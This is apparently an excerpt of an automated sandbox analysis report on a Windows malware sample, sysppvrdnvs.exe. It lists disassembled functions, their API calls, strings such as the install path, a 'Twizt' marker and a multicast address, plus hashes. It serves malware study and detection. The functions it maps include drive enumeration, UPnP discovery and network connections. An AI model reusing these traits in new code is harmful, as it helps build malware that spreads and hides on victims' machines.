                                                                                                                                    • Instruction ID: a96cc5071c69656b1b6f4b00c6699880e4d6530ea1aa1078cf67c052952084b8
                                                                                                                                    • Opcode Fuzzy Hash: 0f885536a534958de828f6dadf3c238a14188cbeabebc74b6a6376721a3f9b9c
                                                                                                                                    • Instruction Fuzzy Hash: 643116B0C01218DFCB50DFA8DC887EDBBB4BB48304F1085AAE609B6290D7795AC4CF59
                                                                                                                                    Function 004063E0 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 55registryCOMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    APIs
                                                                                                                                    • GetLogicalDrives.KERNEL32 ref: 004063E6
                                                                                                                                    • RegOpenKeyExW.KERNEL32(80000002,Software\Microsoft\Windows\CurrentVersion\Policies\Explorer,00000000,00020019,?), ref: 00406434
                                                                                                                                    • RegQueryValueExW.KERNEL32(?,NoDrives,00000000,00000000,00000000,00000004), ref: 00406461
                                                                                                                                    • RegCloseKey.ADVAPI32(?), ref: 0040647E
                                                                                                                                    Strings
                                                                                                                                    • Software\Microsoft\Windows\CurrentVersion\Policies\Explorer, xrefs: 00406427
                                                                                                                                    • NoDrives, xrefs: 00406458
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000002.00000002.2003370192.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    • Associated: 00000002.00000002.2003359211.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                    • Associated: 00000002.00000002.2003382841.0000000000410000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                    • Associated: 00000002.00000002.2003395330.0000000000414000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_2_2_400000_sysppvrdnvs.jbxd
                                                                                                                                    Yara matches
                                                                                                                                    Similarity
                                                                                                                                    • API ID: CloseDrivesLogicalOpenQueryValue
                                                                                                                                    • String ID: NoDrives$Software\Microsoft\Windows\CurrentVersion\Policies\Explorer
                                                                                                                                    • API String ID: 2666887985-3471754645
                                                                                                                                    • Opcode ID: dded7858fb8d287b6bf9178ccf4275851236264e48071ce0b3ae741169170e3e
                                                                                                                                    • Instruction ID: 87cba227ccd7b938b07588cb79f30f32aa16a0fd6c84a7572e83495dfcaef010
                                                                                                                                    • Opcode Fuzzy Hash: dded7858fb8d287b6bf9178ccf4275851236264e48071ce0b3ae741169170e3e
                                                                                                                                    • Instruction Fuzzy Hash: D311FCB0E0020A9BDB10CFD0D945BEEBBB4BB08304F118119E615B7280D7B85685CF99
                                                                                                                                    Function 0040DBE0 Relevance: 9.1, APIs: 6, Instructions: 80threadCOMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    APIs
                                                                                                                                    • EnterCriticalSection.KERNEL32(-00000004,00000000), ref: 0040DC04
                                                                                                                                      • Part of subcall function 0040DCD0: WaitForSingleObject.KERNEL32(?,00000000), ref: 0040DD10
                                                                                                                                      • Part of subcall function 0040DCD0: CloseHandle.KERNEL32(?), ref: 0040DD29
                                                                                                                                    • CreateThread.KERNEL32(00000000,?,00000000,?,00000000,?), ref: 0040DC5F
                                                                                                                                    • GetCurrentProcess.KERNEL32(00000000,00000000,00000000,00000002), ref: 0040DC9C
                                                                                                                                    • GetCurrentProcess.KERNEL32(00000000,00000000), ref: 0040DCA7
                                                                                                                                    • DuplicateHandle.KERNEL32(00000000), ref: 0040DCAE
                                                                                                                                    • LeaveCriticalSection.KERNEL32(-00000004), ref: 0040DCC2
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000002.00000002.2003370192.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    • Associated: 00000002.00000002.2003359211.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                    • Associated: 00000002.00000002.2003382841.0000000000410000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                    • Associated: 00000002.00000002.2003395330.0000000000414000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_2_2_400000_sysppvrdnvs.jbxd
                                                                                                                                    Yara matches
                                                                                                                                    Similarity
                                                                                                                                    • API ID: CriticalCurrentHandleProcessSection$CloseCreateDuplicateEnterLeaveObjectSingleThreadWait
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 2251373460-0
                                                                                                                                    • Opcode ID: 2e6c4f739912ed2bc0a02cfb396969f5dbba436efce4c3680658a262bb647ab9
                                                                                                                                    • Instruction ID: 271f69a92097b1b74c70525479ef463fb32d1143369d808ec26f6a45d53993ac
                                                                                                                                    • Opcode Fuzzy Hash: 2e6c4f739912ed2bc0a02cfb396969f5dbba436efce4c3680658a262bb647ab9
                                                                                                                                    • Instruction Fuzzy Hash: 8D31FA74A00208EFDB04DF98D889B9E7BB5EF48314F0085A8E906A7391D774EA95CF94
                                                                                                                                    Function 00407720 Relevance: 9.1, APIs: 6, Instructions: 65sleepCOMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    APIs
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000002.00000002.2003370192.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    • Associated: 00000002.00000002.2003359211.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                    • Associated: 00000002.00000002.2003382841.0000000000410000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                    • Associated: 00000002.00000002.2003395330.0000000000414000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_2_2_400000_sysppvrdnvs.jbxd
                                                                                                                                    Yara matches
                                                                                                                                    Similarity
                                                                                                                                    • API ID: Sleep$CountTickrandsrand
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 3488799664-0
                                                                                                                                    • Opcode ID: 95932355324cd33d74b870fd3c13360e694d795896d581ce62ec288b395a73ba
                                                                                                                                    • Instruction ID: d526f444081091d18ff5343ef40ffd9a09f2c1e6f6858c3ecb06089bc02b22b2
                                                                                                                                    • Opcode Fuzzy Hash: 95932355324cd33d74b870fd3c13360e694d795896d581ce62ec288b395a73ba
                                                                                                                                    • Instruction Fuzzy Hash: 1F21A479E00208FBC704DF60D885AAE7B31AB45304F10C47AE9026B381D679BA80CB56
                                                                                                                                    Function 00401200 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 106networkCOMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    APIs
                                                                                                                                    • memcpy.NTDLL(00000004,00000000,?,?), ref: 00401258
                                                                                                                                    • htons.WS2_32(?), ref: 00401281
                                                                                                                                    • sendto.WS2_32(?,00000000,?,00000000,?,00000010), ref: 004012A9
                                                                                                                                    • InterlockedExchangeAdd.KERNEL32(?,00000000), ref: 004012BE
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000002.00000002.2003370192.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    • Associated: 00000002.00000002.2003359211.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                    • Associated: 00000002.00000002.2003382841.0000000000410000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                    • Associated: 00000002.00000002.2003395330.0000000000414000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_2_2_400000_sysppvrdnvs.jbxd
                                                                                                                                    Yara matches
                                                                                                                                    Similarity
                                                                                                                                    • API ID: ExchangeInterlockedhtonsmemcpysendto
                                                                                                                                    • String ID: pdu
                                                                                                                                    • API String ID: 2164660128-2320407122
                                                                                                                                    • Opcode ID: b069b6341f395dab984beb8928ef2dc1d0a12e44db74397201ebfa712d18ea75
                                                                                                                                    • Instruction ID: 05dd75d8116292c76d11c3cc90d45d23dbf78b8bb9632d9a28891a4d74dcab7a
                                                                                                                                    • Opcode Fuzzy Hash: b069b6341f395dab984beb8928ef2dc1d0a12e44db74397201ebfa712d18ea75
                                                                                                                                    • Instruction Fuzzy Hash: 0731B3762083009BC710DF69D880A9BBBF4AFC9714F04457EFD9897381D6349914C7AB
                                                                                                                                    Function 00407390 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 22memoryCOMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    APIs
                                                                                                                                    • CoInitializeEx.OLE32(00000000,00000002,?,?,004083D7), ref: 00407398
                                                                                                                                    • SysAllocString.OLEAUT32(C:\Windows\sysppvrdnvs.exe), ref: 004073A3
                                                                                                                                    • CoUninitialize.OLE32 ref: 004073C8
                                                                                                                                      • Part of subcall function 004073E0: SysFreeString.OLEAUT32(00000000), ref: 004075F8
                                                                                                                                    • SysFreeString.OLEAUT32(00000000), ref: 004073C2
                                                                                                                                    Strings
                                                                                                                                    • C:\Windows\sysppvrdnvs.exe, xrefs: 0040739E
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000002.00000002.2003370192.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    • Associated: 00000002.00000002.2003359211.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                    • Associated: 00000002.00000002.2003382841.0000000000410000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                    • Associated: 00000002.00000002.2003395330.0000000000414000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_2_2_400000_sysppvrdnvs.jbxd
                                                                                                                                    Yara matches
                                                                                                                                    Similarity
                                                                                                                                    • API ID: String$Free$AllocInitializeUninitialize
                                                                                                                                    • String ID: C:\Windows\sysppvrdnvs.exe
                                                                                                                                    • API String ID: 459949847-2879333202
                                                                                                                                    • Opcode ID: d549018ca7281a3a12c42c42db4c5aa0698fc19bb076c2a4b3e2f7f0a4b3168e
                                                                                                                                    • Instruction ID: 94d3ecd3e534f0c2973a063d63be5db40503c7f445082467247c405133df6831
                                                                                                                                    • Opcode Fuzzy Hash: d549018ca7281a3a12c42c42db4c5aa0698fc19bb076c2a4b3e2f7f0a4b3168e
                                                                                                                                    • Instruction Fuzzy Hash: FEE01275944208FBD7049FA0ED0EB9D77649B04341F1041A5FD05A22A1DAF56E80D755
                                                                                                                                    Function 00401100 Relevance: 6.1, APIs: 4, Instructions: 86synchronizationCOMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    APIs
                                                                                                                                    • ioctlsocket.WS2_32 ref: 0040112B
                                                                                                                                    • recvfrom.WS2_32 ref: 0040119C
                                                                                                                                    • InterlockedExchangeAdd.KERNEL32(?,00000000), ref: 004011B2
                                                                                                                                    • WaitForSingleObject.KERNEL32(?,00000001), ref: 004011D3
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000002.00000002.2003370192.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    • Associated: 00000002.00000002.2003359211.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                    • Associated: 00000002.00000002.2003382841.0000000000410000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                    • Associated: 00000002.00000002.2003395330.0000000000414000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_2_2_400000_sysppvrdnvs.jbxd
                                                                                                                                    Yara matches
                                                                                                                                    Similarity
                                                                                                                                    • API ID: ExchangeInterlockedObjectSingleWaitioctlsocketrecvfrom
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 3980219359-0
                                                                                                                                    • Opcode ID: e871f297b8ec647587383603dc2ce7d0bb970bcccd2ecc260039be8e6d46355a
                                                                                                                                    • Instruction ID: daf299aa3b87b71fb70ff151311bbfa052327c8c190f043936f27822c7d74034
                                                                                                                                    • Opcode Fuzzy Hash: e871f297b8ec647587383603dc2ce7d0bb970bcccd2ecc260039be8e6d46355a
                                                                                                                                    • Instruction Fuzzy Hash: 1621C3B1504301AFD304DF65DC84A6BB7E9EF88314F004A3EF559A6290E774D94887EA
                                                                                                                                    Function 004073E0 Relevance: 5.5, APIs: 2, Strings: 1, Instructions: 238COMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    APIs
                                                                                                                                      • Part of subcall function 00407670: CoCreateInstance.OLE32(00000000,00000000,00004401,00000000,00000000), ref: 00407690
                                                                                                                                    • SysFreeString.OLEAUT32(00000000), ref: 004075F8
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000002.00000002.2003370192.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    • Associated: 00000002.00000002.2003359211.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                    • Associated: 00000002.00000002.2003382841.0000000000410000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                    • Associated: 00000002.00000002.2003395330.0000000000414000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_2_2_400000_sysppvrdnvs.jbxd
                                                                                                                                    Yara matches
                                                                                                                                    Similarity
                                                                                                                                    • API ID: CreateFreeInstanceString
                                                                                                                                    • String ID: Microsoft Corporation
                                                                                                                                    • API String ID: 586785272-3838278685
                                                                                                                                    • Opcode ID: f4fe66ce6675b0d6da11f671660511fb708902cff3c761094ed99d43740cd4e9
                                                                                                                                    • Instruction ID: e42f15a5a8f3a5930d9f1f6311551bcb6c6e46ad7cdc057207f56e8781896ff9
                                                                                                                                    • Opcode Fuzzy Hash: f4fe66ce6675b0d6da11f671660511fb708902cff3c761094ed99d43740cd4e9
                                                                                                                                    • Instruction Fuzzy Hash: 5191FB75E0450AAFCB14DB98CC94EAFB7B5BF48300F208169E505B73A0D735AE42CB66
                                                                                                                                    Function 0040E0C0 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 60COMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    APIs
                                                                                                                                    • CoInitializeEx.COMBASE(00000000,00000002,?,?,?,004083D2), ref: 0040E0CA
                                                                                                                                      • Part of subcall function 0040E190: socket.WS2_32(00000002,00000002,00000011), ref: 0040E1AA
                                                                                                                                      • Part of subcall function 0040E190: htons.WS2_32(0000076C), ref: 0040E1E0
                                                                                                                                      • Part of subcall function 0040E190: inet_addr.WS2_32(239.255.255.250), ref: 0040E1EF
                                                                                                                                      • Part of subcall function 0040E190: setsockopt.WS2_32(000000FF,0000FFFF,00000020,00000001,00000001), ref: 0040E20D
                                                                                                                                      • Part of subcall function 0040E190: bind.WS2_32(000000FF,?,00000010), ref: 0040E243
                                                                                                                                      • Part of subcall function 0040E190: lstrlenA.KERNEL32(X#A,00000000,?,00000010), ref: 0040E25C
                                                                                                                                      • Part of subcall function 0040E190: sendto.WS2_32(000000FF,X#A,00000000), ref: 0040E26B
                                                                                                                                      • Part of subcall function 0040E190: ioctlsocket.WS2_32(000000FF,8004667E,00000001), ref: 0040E285
                                                                                                                                      • Part of subcall function 0040E400: SysFreeString.OLEAUT32(00000000), ref: 0040E4DB
                                                                                                                                      • Part of subcall function 0040E400: SysFreeString.OLEAUT32(00000000), ref: 0040E4E5
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000002.00000002.2003370192.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    • Associated: 00000002.00000002.2003359211.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                    • Associated: 00000002.00000002.2003382841.0000000000410000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                    • Associated: 00000002.00000002.2003395330.0000000000414000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_2_2_400000_sysppvrdnvs.jbxd
                                                                                                                                    Yara matches
                                                                                                                                    Similarity
                                                                                                                                    • API ID: FreeString$Initializebindhtonsinet_addrioctlsocketlstrlensendtosetsockoptsocket
                                                                                                                                    • String ID: TCP$UDP
                                                                                                                                    • API String ID: 1519345861-1097902612
                                                                                                                                    • Opcode ID: 4d93ce47139e5fe62163282bdde6dfb132a2b2f81b545c1a314b9c0cb3165857
                                                                                                                                    • Instruction ID: 4536849a39b1ff6f82dd019fff268beff13b49d9c24eb1714a693627677867a5
                                                                                                                                    • Opcode Fuzzy Hash: 4d93ce47139e5fe62163282bdde6dfb132a2b2f81b545c1a314b9c0cb3165857
                                                                                                                                    • Instruction Fuzzy Hash: C511B4B4E00208EBDB00EFD6DC45BAE7375AB44708F10896AE5047B2C2D6799E21CB89
                                                                                                                                    Function 00405EF0 Relevance: 5.1, APIs: 4, Instructions: 70COMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    APIs
                                                                                                                                    • EnterCriticalSection.KERNEL32(00415B88,?,00000000,?), ref: 00405EFF
                                                                                                                                    • memcpy.NTDLL(00000000,00000000,00000100), ref: 00405F3E
                                                                                                                                    • memcpy.NTDLL(00000000,00000000,00000100), ref: 00405FB3
                                                                                                                                    • LeaveCriticalSection.KERNEL32(00415B88), ref: 00405FD0
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000002.00000002.2003370192.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    • Associated: 00000002.00000002.2003359211.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                    • Associated: 00000002.00000002.2003382841.0000000000410000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                    • Associated: 00000002.00000002.2003395330.0000000000414000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_2_2_400000_sysppvrdnvs.jbxd
                                                                                                                                    Yara matches
                                                                                                                                    Similarity
                                                                                                                                    • API ID: CriticalSectionmemcpy$EnterLeave
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 469056452-0
                                                                                                                                    • Opcode ID: 77efec874a33dc6ef4a00ec3fd77d3dc6f12d8e4685147c5d49fec21481d5cd3
                                                                                                                                    • Instruction ID: 31cd86352096c342a95fcbe165c6b10336903156d0058c686e7ee331cda8bfc5
                                                                                                                                    • Opcode Fuzzy Hash: 77efec874a33dc6ef4a00ec3fd77d3dc6f12d8e4685147c5d49fec21481d5cd3
                                                                                                                                    • Instruction Fuzzy Hash: 08218D35D04609EFDB04DB94D885BDEBB71EB44304F1481BAE8096B380D37CA985CF8A
                                                                                                                                    Function 0040D550 Relevance: 4.6, APIs: 3, Instructions: 120COMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    APIs
                                                                                                                                    • InterlockedExchangeAdd.KERNEL32(?,00000000), ref: 0040D55C
                                                                                                                                    • InterlockedIncrement.KERNEL32(000000FF), ref: 0040D591
                                                                                                                                    • InterlockedDecrement.KERNEL32(000000FF), ref: 0040D694
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000002.00000002.2003370192.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    • Associated: 00000002.00000002.2003359211.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                    • Associated: 00000002.00000002.2003382841.0000000000410000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                    • Associated: 00000002.00000002.2003395330.0000000000414000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_2_2_400000_sysppvrdnvs.jbxd
                                                                                                                                    Yara matches
                                                                                                                                    Similarity
                                                                                                                                    • API ID: Interlocked$DecrementExchangeIncrement
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 2813130747-0
                                                                                                                                    • Opcode ID: 2fee3be20291be679849425b2a558d830a1bd18b2d7523083afa5bcd13941f98
                                                                                                                                    • Instruction ID: 92f239bb69865f4ea5ccc2fa5ab36589b1b4cdc7d17313df2dab11b9d7d6be27
                                                                                                                                    • Opcode Fuzzy Hash: 2fee3be20291be679849425b2a558d830a1bd18b2d7523083afa5bcd13941f98
                                                                                                                                    • Instruction Fuzzy Hash: 8A41C3B5E00208BBDF00EBE4DC45FAF7B755B04304F048569B5057B2C2D679E54487A9
                                                                                                                                    Function 0040BE30 Relevance: 4.6, APIs: 1, Strings: 2, Instructions: 53stringCOMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    APIs
                                                                                                                                    • lstrlenA.KERNEL32(Twizt,?,?,?,?,8@,00000000,8@,0040E038,00000000,00000000), ref: 0040BE7C
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000002.00000002.2003370192.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    • Associated: 00000002.00000002.2003359211.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                    • Associated: 00000002.00000002.2003382841.0000000000410000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                    • Associated: 00000002.00000002.2003395330.0000000000414000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_2_2_400000_sysppvrdnvs.jbxd
                                                                                                                                    Yara matches
                                                                                                                                    Similarity
                                                                                                                                    • API ID: lstrlen
                                                                                                                                    • String ID: Twizt$Twizt
                                                                                                                                    • API String ID: 1659193697-16428492
                                                                                                                                    • Opcode ID: f14bce065c89644a6f21cf12e38f72a35e2d7cb85be709d5cf8e4e3a1ae766ed
                                                                                                                                    • Instruction ID: 424cb4e193b88585781965e36c58f6fe4c92dd312b0dedf0f064d4bdf42048bf
                                                                                                                                    • Opcode Fuzzy Hash: f14bce065c89644a6f21cf12e38f72a35e2d7cb85be709d5cf8e4e3a1ae766ed
                                                                                                                                    • Instruction Fuzzy Hash: AE113DB5900108BFDB04DFA8D941E9EB7B5EF48304F14C1A9FD19AB342D635EA10CBA6
                                                                                                                                    Function 0040D840 Relevance: 4.5, APIs: 3, Instructions: 45networkCOMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    APIs
                                                                                                                                    • socket.WS2_32(00000002,00000001,00000006), ref: 0040D853
                                                                                                                                    • htons.WS2_32(00009E34), ref: 0040D885
                                                                                                                                    • connect.WS2_32(000000FF,?,00000010), ref: 0040D89F
                                                                                                                                      • Part of subcall function 0040B4F0: shutdown.WS2_32(0040B4DD,00000002), ref: 0040B4F9
                                                                                                                                      • Part of subcall function 0040B4F0: closesocket.WS2_32(0040B4DD), ref: 0040B503
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000002.00000002.2003370192.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    • Associated: 00000002.00000002.2003359211.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                    • Associated: 00000002.00000002.2003382841.0000000000410000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                    • Associated: 00000002.00000002.2003395330.0000000000414000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_2_2_400000_sysppvrdnvs.jbxd
                                                                                                                                    Yara matches
                                                                                                                                    Similarity
                                                                                                                                    • API ID: closesocketconnecthtonsshutdownsocket
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 1987800339-0
                                                                                                                                    • Opcode ID: 33603a608139399c0d84bb830c7b48966f7cdbf7a5e618daadc4b0f5ccc7d938
                                                                                                                                    • Instruction ID: fe5c709ea45c5a11aa3c9160e55f3cfd3489188b927fc5d3b71a7e9497cbc338
                                                                                                                                    • Opcode Fuzzy Hash: 33603a608139399c0d84bb830c7b48966f7cdbf7a5e618daadc4b0f5ccc7d938
                                                                                                                                    • Instruction Fuzzy Hash: 91113C74D05209EBCB10DFE4D9096AEB770AF08320F2082A9E525A73D0D7744F05975A
                                                                                                                                    Function 004076C0 Relevance: 4.5, APIs: 3, Instructions: 35threadCOMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    APIs
                                                                                                                                    • memcpy.NTDLL(00000000,?,?), ref: 004076E8
                                                                                                                                    • CreateThread.KERNEL32(00000000,00000000,00407720,00000000,00000000,00000000), ref: 0040770A
                                                                                                                                    • CloseHandle.KERNEL32(00000000), ref: 00407711
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000002.00000002.2003370192.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    • Associated: 00000002.00000002.2003359211.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                    • Associated: 00000002.00000002.2003382841.0000000000410000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                    • Associated: 00000002.00000002.2003395330.0000000000414000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_2_2_400000_sysppvrdnvs.jbxd
                                                                                                                                    Yara matches
                                                                                                                                    Similarity
                                                                                                                                    • API ID: CloseCreateHandleThreadmemcpy
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 2064604595-0
                                                                                                                                    • Opcode ID: 04a8122a2976dc4ffad86fc0c0be3d86b203506bfba9848779d9363a105f676e
                                                                                                                                    • Instruction ID: 1765171bc77b4966af89c460e37a8a9fa1404b8c40c23c814704cc40933dc83e
                                                                                                                                    • Opcode Fuzzy Hash: 04a8122a2976dc4ffad86fc0c0be3d86b203506bfba9848779d9363a105f676e
                                                                                                                                    • Instruction Fuzzy Hash: 54F090B1A04308FBDB00DFA4DC46F9E7778AB48704F208468FA08A72C1D675BA10C769
                                                                                                                                    Function 0040A820 Relevance: 4.5, APIs: 3, Instructions: 34memoryCOMMONLIBRARYCODE
                                                                                                                                    Download Yara Rule
                                                                                                                                    APIs
                                                                                                                                      • Part of subcall function 0040A800: GetCurrentProcessId.KERNEL32(?,0040A76B,?,0040D07E,00000010,?,?,?,?,?,?,0040CDEB), ref: 0040A803
                                                                                                                                    • HeapCreate.KERNEL32(00000000,00000000,00000000,?,?,0040A777,?,0040D07E,00000010,?,?,?,?,?,?,0040CDEB), ref: 0040A84C
                                                                                                                                    • HeapSetInformation.KERNEL32(02DE0000,00000000,00000002,00000004), ref: 0040A876
                                                                                                                                    • GetCurrentProcessId.KERNEL32 ref: 0040A87C
                                                                                                                                      • Part of subcall function 0040A890: GetProcessHeaps.KERNEL32(000000FF,?), ref: 0040A8AC
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000002.00000002.2003370192.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    • Associated: 00000002.00000002.2003359211.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                    • Associated: 00000002.00000002.2003382841.0000000000410000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                    • Associated: 00000002.00000002.2003395330.0000000000414000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_2_2_400000_sysppvrdnvs.jbxd
                                                                                                                                    Yara matches
                                                                                                                                    Similarity
                                                                                                                                    • API ID: Process$CurrentHeap$CreateHeapsInformation
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 3179415709-0
                                                                                                                                    • Opcode ID: aa0c888e319f0ad9fd531053ca841c15f09ebe8eab889de8fcd1a964cf2e908b
                                                                                                                                    • Instruction ID: 85029bc915bf12f33225f801dda82e4fa7d324228b613a3c41ba46cae7947946
                                                                                                                                    • Opcode Fuzzy Hash: aa0c888e319f0ad9fd531053ca841c15f09ebe8eab889de8fcd1a964cf2e908b
                                                                                                                                    • Instruction Fuzzy Hash: 78F06DB1940305BBD324AB61BC05FA63B65B704305F08C17EEA00DA2D1EB79D810C69E
                                                                                                                                    Function 0040F1F0 Relevance: 4.5, APIs: 3, Instructions: 28fileCOMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    APIs
                                                                                                                                    • CreateFileW.KERNEL32(00406FA0,80000000,00000001,00000000,00000003,00000000,00000000,00406FA0), ref: 0040F210
                                                                                                                                    • GetFileSize.KERNEL32(000000FF,00000000), ref: 0040F225
                                                                                                                                    • CloseHandle.KERNEL32(000000FF), ref: 0040F232
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000002.00000002.2003370192.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    • Associated: 00000002.00000002.2003359211.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                    • Associated: 00000002.00000002.2003382841.0000000000410000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                    • Associated: 00000002.00000002.2003395330.0000000000414000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_2_2_400000_sysppvrdnvs.jbxd
